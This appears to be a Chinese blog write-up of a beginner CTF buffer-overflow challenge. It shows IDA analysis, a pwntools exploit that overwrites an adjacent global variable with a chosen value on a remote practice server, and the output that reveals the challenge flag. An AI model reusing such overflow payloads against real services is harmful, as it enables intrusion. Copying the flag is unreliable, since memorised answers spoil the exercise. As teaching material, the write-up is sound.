Sorry, your browser cannot access this site
This page requires browser support (enable) JavaScript
Learn more >

观察

用ida打开文件查看main函数:

image-20250512100202857

查看sub_400686()

image-20250512100301717

也就是说我们如果可以满足if的条件便可以得到flag。

查看unk_601068dword_60106C的位置(直接点击这2个变量即可):

image-20250512100457261

可以发现他们的地址只差了4Byte。

Exploit

我们需要做的是发送一段内容,结构如下:

1
payload = b"AAAA" + p32(1853186401)

首先将它们中间差的4个Byte给填满,然后便可以将dword_60106C原本的内容覆盖成满足if要求的值,之后便可以直接得到flag。

Exploit代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *

r = remote("61.147.171.105", 59747)

res = r.recvline()
print(res)
res = r.recvline()
print(res)

payload = b"AAAA" + p32(1853186401)
r.sendline(payload)

res = r.recvall()
print(res)

# [x] Opening connection to 61.147.171.105 on port 59747
# [x] Opening connection to 61.147.171.105 on port 59747: Trying 61.147.171.105
# [+] Opening connection to 61.147.171.105 on port 59747: Done
# b'~~ welcome to ctf ~~ \n'
# b'lets get helloworld for bof\n'
# [x] Receiving all data
# [x] Receiving all data: 0B
# [x] Receiving all data: 45B
# [+] Receiving all data: Done (45B)
# [*] Closed connection to 61.147.171.105 port 59747
# b'cyberpeace{7ffb977ba34907b01a6b6b74280a5921}\n'